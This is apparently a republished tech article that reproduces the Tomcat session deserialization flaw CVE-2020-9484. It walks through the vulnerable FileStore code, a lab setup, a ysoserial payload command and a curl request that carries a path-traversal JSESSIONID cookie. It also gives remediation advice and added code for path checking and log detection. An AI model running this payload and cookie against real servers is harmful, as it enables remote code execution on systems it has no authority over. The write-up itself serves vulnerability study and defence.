2025-02-24 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article shows how to reproduce the Tomcat Session deserialization vulnerability in a concise and easy-to-understand way. I hope you get something out of its detailed walkthrough.
0x01 Introduction
Apache Tomcat was originally developed by Sun Microsystems as a Servlet container and was donated to the ASF (Apache Software Foundation) in 1999; it belonged to the Jakarta project and is now an independent top-level project. Tomcat mainly implements the Servlet and JSP specifications of Java EE and also provides HTTP service. It is a very popular Java Web container.
The Tomcat server is a free, open-source, lightweight Web application server. It is widely used in small and medium-sized systems with few concurrent users, and it is the first choice for developing and debugging JSP programs. For a beginner it can be thought of this way: once an Apache server is configured on a machine, it can respond to requests for HTML pages (HTML being an application of the Standard Generalized Markup Language). Tomcat is effectively an extension of the Apache server, but at run time it runs independently, so when you run Tomcat it actually runs as a separate process from Apache.
0x02 Vulnerability introduction
On May 20, 2020 (Beijing time), Apache officially issued a risk notice for an Apache Tomcat remote code execution vulnerability, numbered CVE-2020-9484.
Apache Tomcat is an open source Java-based Web application container that runs servlet and JSP Web applications. When Tomcat uses the native session synchronization feature with an insecure configuration (one that does not use EncryptInterceptor), a deserialization vulnerability exists. Through carefully constructed packets, attackers can attack Tomcat servers that use the native session synchronization feature.
Successful exploitation requires the following four conditions to be met at the same time:
1. The attacker can control the contents and names of files on the server.
2. FileStore is used in the server's PersistenceManager configuration.
3. The sessionAttributeValueClassNameFilter in PersistenceManager is configured as "null", or the filter is not strict enough and allows an attacker-supplied object to be deserialized.
4. The attacker knows the relative path from the FileStore storage location to the files the attacker controls.
0x03 Affected versions
Apache Tomcat 10.0.0-M1 to 10.0.0-M4
Apache Tomcat 9.0.0.M1 to 9.0.34
Apache Tomcat 8.5.0 to 8.5.54
Apache Tomcat 7.0.0 to 7.0.103
0x04 Vulnerability analysis
Based on the configuration above, find the Tomcat source code; Tomcat 10.0.0-M4 is used here for analysis.
Check the load method of FileStore. The code is as follows:
load first converts the session id into a File object, checks whether the file exists and, if so, reads it. The File object is built by appending the suffix ".session" to the supplied id, but there is no check that the resulting file lies within the store directory.
When the file exists, the system will run
The getObjectInputStream method uses org.apache.catalina.util.CustomObjectInputStream to obtain the gadget class and then deserializes the session file.
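The missing containment check described above is the heart of the bug. The following is an added example (not Tomcat's code and not from this article) that contrasts the unchecked id-to-file resolution with a hardened one; the store directory is a hypothetical path, since the page's own context.xml snippet is not shown.

```python
import posixpath

# Hypothetical FileStore directory; the article's context.xml snippet is not
# shown, so this path is a constructed example.
STORE_DIR = "/usr/local/tomcat/sessions"
SUFFIX = ".session"


def unchecked_session_file(store_dir: str, session_id: str) -> str:
    """What the analysis above describes: append ".session" to the id and
    join it to the store directory without checking where it ends up.
    A traversal id therefore resolves to a file outside the store."""
    return posixpath.normpath(posixpath.join(store_dir, session_id + SUFFIX))


def checked_session_file(store_dir: str, session_id: str):
    """Hardened resolution.  Returns the file path only when the id is a flat
    file name whose normalised path stays inside store_dir, else None."""
    if not session_id:
        return None
    # A session id is a single path component: separators and NULs mean the
    # caller is supplying a path, not an id.
    if any(ch in session_id for ch in ("/", "\\", "\0")):
        return None
    base = posixpath.normpath(store_dir)
    candidate = posixpath.normpath(posixpath.join(base, session_id + SUFFIX))
    # Containment check: the candidate must be strictly below the store
    # directory ("base/" prefix, so a sibling such as base + "2" does not pass).
    if not candidate.startswith(base + "/"):
        return None
    return candidate


def is_traversal_attempt(store_dir: str, session_id: str) -> bool:
    """True when the unchecked resolution would leave the store directory."""
    base = posixpath.normpath(store_dir)
    return not unchecked_session_file(store_dir, session_id).startswith(base + "/")


if __name__ == "__main__":
    for sid in ("A1B2C3D4", "../../../../tmp/test", "sub/evil"):
        print(sid, "->", unchecked_session_file(STORE_DIR, sid),
              "| checked:", checked_session_file(STORE_DIR, sid))
```

In a real server the hardened version should compare canonical paths (Java's File.getCanonicalPath) rather than merely normalised strings, so that a symlink placed inside the store directory cannot redirect the lookup either.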
0x05 Environment setup
Installing Tomcat requires a Java 8 environment; a Java 8 installation tutorial is at:
https://www.jianshu.com/p/9ec7838411c8
Set up a Tomcat service by downloading Tomcat 10.0.0-M4 from the following address:
https://repo1.maven.org/maven2/org/apache/tomcat/tomcat/10.0.0-M4/tomcat-10.0.0-M4.tar.gz
Create a tomcat directory under /usr/local/ and extract the files into it:
mkdir /usr/local/tomcat
tar -zxvf tomcat-10.0.0-M4.tar.gz -C /usr/local/tomcat/
Modify /usr/local/tomcat/conf/context.xml to add the Manager:
Download groovy-2.3.9.jar and put it in the /usr/local/tomcat/lib directory. Execute under lib:
wget https://repo1.maven.org/maven2/org/codehaus/groovy/groovy/2.3.9/groovy-2.3.9.jar
Run Tomcat: /usr/local/tomcat/bin/catalina.sh start
When the browser accesses http://ip:8080 and the following page appears, the installation succeeded.
0x06 Vulnerability reproduction
Download ysoserial, a .jar tool that generates Java deserialization payloads.
Download address: git clone https://github.com/frohoff/ysoserial.git
Execute the following command to generate the payload:
java -jar ysoserial-master-30099844c6-1.jar Groovy1 "touch /tmp/2333" > /tmp/test.session
Add Cookie: JSESSIONID=../tmp/test to the captured request for the home page in the browser.
Or run the PoC directly in the environment, loading the malicious persisted session file through JSESSIONID:
curl 'http://172.16.1.186:8080/index.jsp' -H 'Cookie: JSESSIONID=../tmp/test'
Run ls /tmp to view the result.
0x07 Remediation
Upgrade to a fixed version, or configure a WAF to filter strings such as ../, or do not use FileStore.
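The WAF filtering suggested above can also be applied after the fact to access logs. The following is an added detection example (not part of this article and not a Tomcat component) that scans constructed access-log lines for JSESSIONID values carrying traversal sequences, including percent-encoded variants; it assumes the AccessLogValve pattern was extended with %{Cookie}i so that the Cookie header appears as the last quoted field.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (fabricated for this example, not a
# capture).  They assume the AccessLogValve pattern ends with %{Cookie}i, so
# the request's Cookie header is the final quoted field of each line.
SAMPLE_LOG = """\
10.0.0.5 - - [31/May/2020:10:00:01 +0000] "GET /index.jsp HTTP/1.1" 200 1024 "JSESSIONID=1A2B3C4D5E6F7A8B"
10.0.0.9 - - [31/May/2020:10:00:02 +0000] "GET /index.jsp HTTP/1.1" 200 1024 "theme=dark; JSESSIONID=../tmp/test"
10.0.0.9 - - [31/May/2020:10:00:03 +0000] "GET /index.jsp HTTP/1.1" 200 1024 "JSESSIONID=..%2F..%2Ftmp%2Ftest"
10.0.0.7 - - [31/May/2020:10:00:04 +0000] "GET /index.jsp HTTP/1.1" 200 1024 "-"
10.0.0.5 - - [31/May/2020:10:00:05 +0000] "GET /index.jsp HTTP/1.1" 200 1024 "JSESSIONID=1A2B3C4D5E6F7A8B.node1"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) .*? "(?P<cookie>[^"]*)"$')
# Shape of the ids Tomcat itself issues: alphanumeric, optionally followed by
# a ".jvmRoute" suffix.  Anything else is suspicious for a FileStore lookup.
SAFE_ID_RE = re.compile(r'^[A-Za-z0-9]+(\.[A-Za-z0-9_-]+)?$')


def jsessionid_from_cookie(cookie_header: str):
    """Return the raw JSESSIONID value from a Cookie header, or None."""
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name == "JSESSIONID":
            return value
    return None


def decode_fully(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded traversal is not missed."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_session_id(raw_id: str):
    """Return a reason string if the id looks like a traversal attempt, else None."""
    decoded = decode_fully(raw_id)
    if ".." in decoded or "/" in decoded or "\\" in decoded or "\0" in decoded:
        return "path traversal sequence in JSESSIONID: %r" % decoded
    if not SAFE_ID_RE.match(decoded):
        return "unexpected characters in JSESSIONID: %r" % decoded
    return None


def scan_access_log(text: str):
    """Return a list of (client_ip, raw_id, reason) for every suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw_id = jsessionid_from_cookie(m.group("cookie"))
        if raw_id is None:
            continue
        reason = classify_session_id(raw_id)
        if reason:
            findings.append((m.group("ip"), raw_id, reason))
    return findings


if __name__ == "__main__":
    for ip, raw_id, reason in scan_access_log(SAMPLE_LOG):
        print(ip, raw_id, reason)
```

Tomcat's default access-log pattern does not record cookies, so the Cookie field must be added to the valve pattern before this scan has anything to match on; the same classify_session_id check can equally be placed in a request filter in front of the application.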
The above is how to reproduce the Tomcat Session deserialization vulnerability. Have you learned any knowledge or skills from it? If you want to learn more skills or enrich your knowledge, you are welcome to follow the industry information channel.